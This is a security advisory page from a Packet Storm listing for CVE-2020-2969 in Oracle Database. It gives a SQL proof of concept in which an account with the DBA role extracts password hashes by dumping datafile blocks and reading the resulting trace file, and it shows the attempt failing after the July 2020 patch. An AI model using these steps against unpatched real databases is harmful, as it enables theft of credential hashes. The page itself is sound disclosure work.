exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Database Password Hash Unauthorized Access

Oracle Database Password Hash Unauthorized Access
Posted Jun 11, 2024
Authored by Emad Al-Mousa

Oracle Database versions 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, and 19c allows for unauthorized access to password hashes by an account with the DBA role.

tags | exploit, info disclosure
advisories | CVE-2020-2969
SHA-256 | edea13d6bbb4e899e5a14a7b29742067ce892997ff2cae4bac02dd2d1a895ab2

Oracle Database Password Hash Unauthorized Access

Change Mirror Download
Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role
Product: Database
Manufacturer: Oracle
Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c
Risk Level: Medium
Solution Status: Fixed
CVE Reference: CVE-2020-2969
Base Score: 6.6
Author of Advisory: Emad Al-Mousa


*****************************************
Vulnerability Details:

Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.

The presented scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore

*****************************************
Proof of Concept (PoC):

This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.

SQL> create user ninja identified by hello_123;


SQL> grant create session to ninja;


SQL> grant dba to ninja;


SQL> alter user ninja default role all;


*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges

** I will perform dump to the system data file to gain access to the hashed passwords

SQL> alter system dump datafile 1 block min 210 block max 215;

** Then immediately I will check the generated trace file name using the query:

SQL> select * from v$diag_info where NAME='Default Trace File';

** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:

SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';

// the password hash will be exposed in the trace file !

After applying Oracle July 2020 CPU patches- try to re-simulate again:

SQL> create user ninja identified by hello_123;


SQL> grant create session to ninja;


SQL> grant dba to ninja;


SQL> alter user ninja default role all;


SQL> show user
USER is "NINJA"

SQL> select * from sys.user$;
select * from sys.user$
*
ERROR at line 1:
ORA-01031: insufficient privileges


SQL> alter system dump datafile 1 block min 210 block max 215;
alter system dump datafile 1 block min 210 block max 215
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> select * from v$diag_info where NAME='Default Trace File';

INST_ID NAME
---------- ----------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
CON_ID
----------
1 Default Trace File
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc


SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';

PAYLOAD
--------------------------------------------------------------------------------
Trace file
/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171
16.trc

Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.8.0.0.0
Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702
ORACLE_HOME: /oraclex/oradbp05/product/19.3
System name: Linux
Node name: boba
Release: 3.10.0-1127.13.1.el7.x86_64
Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020

PAYLOAD
--------------------------------------------------------------------------------
Machine: x86_64
Instance name: ora5
Redo thread mounted by this instance: 1
Oracle process number: 69
Unix process pid: 117116, image: oracle@boba (TNS V1-V3)


*** 2020-07-16T11:09:31.240875+03:00

*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00
*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00

PAYLOAD
--------------------------------------------------------------------------------
*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00
*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00
*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00
*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00

Error: file 1 can only be dumped with SYSDBA privillege



*****************************************
References:
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpujul2020verbose.html
https://nvd.nist.gov/vuln/detail/CVE-2020-2969
https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/



Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close